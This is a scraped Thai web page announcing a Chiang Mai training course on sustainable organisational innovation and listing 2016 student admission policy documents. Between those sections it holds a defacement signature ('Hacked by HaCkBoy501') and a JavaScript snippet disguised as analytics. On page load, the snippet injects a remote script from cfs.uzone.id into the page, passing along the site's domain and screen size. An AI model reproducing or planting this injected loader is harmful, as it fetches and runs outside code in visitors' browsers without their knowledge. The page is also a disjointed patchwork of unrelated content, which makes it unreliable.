การอบรมหลักสูตรนวัตกรรมเพื่อการพัฒนาองค์การและสังคมอย่างยั่งยืนรุ่น2

จังหวัดเชียงใหม่ประชาสัมพันธ์การอบรมหลักสูตรนวัตกรรมเพื่อการพัฒนาองค์การและสังคมอย่างยั่งยืนรุ่น2 รายละเอียด ดังต่อไปนี้

การสมัครเข้าอบรมหลักสูตรนวัตกรรม

H4ckBoy501 

HaCkBoy501

Hacked by HaCkBoy501

Every villain is a hero in his own mind!

Thanks to :
./me ?

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol==”https:” ? “https://” : “http://”);var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ “cfs.uzone.id/2fn7a2/request” + “?id=1” + “&enc=9UwkxLgY9” + “&params=” + “4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BXRVQC8UKbyEdEh4navlZ%2bHXTYKfA8ki1SmXpRMMaelxZMVaphQzIoPZPzy%2bL8O2OBQwHwzAS16p8Kvis1qvGixDqBx9aJDd8b2IFDK%2feQzIPIAYVUU%2fJnD%2foHFnuGi%2fQxw48UoZ5cJ9AgltDzG%2byyZ6qZeXFEgZcN5jVjWXXTCW2kwQzvwZ2tADzo4Szx6mI2vofLADNMrQQWRaUzU43%2fbAiWhX7bRNn7VlRtetJAeeux6QwuQynRxHzAXO9H5a3nUwx6bEjImp41QWg5m6Tjxq%2f27Lw61%2fGDDlBuqM7xznrUc0a4AozyOrXp8duzdPD%2f3whpzKQXDwqb0JEBM2ZO5K4mDdemipZnI%2fxAM0wWBkxe%2bSOslOudwLaCteeARuenXAeIuNoNHv2raFrz5q7cGAPMNDQheHGg3RIqNwGEyYz%2b6zIIuBfdOBtY7UYDlePYfiNaI16r%2bhl%2fcmwGrRSk1kiF5GJW%2f5zEF%2bFL%2bk22IwYI%2fOZaab9Cpdy7XqaK4usDBGB1kycaig5JujLiCl0ssTgWyN9a8G5” + “&idc_r=”+idc_glo_r + “&domain=”+document.domain + “&sw=”+screen.width+”&sh=”+screen.height;var bsa = document.createElement(‘script’);bsa.type = ‘text/javascript’;bsa.async = true;bsa.src = url;(document.getElementsByTagName(‘head’)[0]||document.getElementsByTagName(‘body’)[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

นโยบายการรับนักเรียนปี 2559

นโยบายการรับนักเรียนปี 2559

นโยบายรับ นร.59 สพป,ห้องเรียนพิเศษ(word)

คำสั่งฯ แต่งตั้ง กก.รับ นร.ระดับเขตฯ

คำสั่งฯ ประกาศเกี่ยวกับรับ นร ปี 59 (1)

จัดสรรโอกาส นร.จะจบ ป.6 ต่อ ม.1 ปี 59 (1)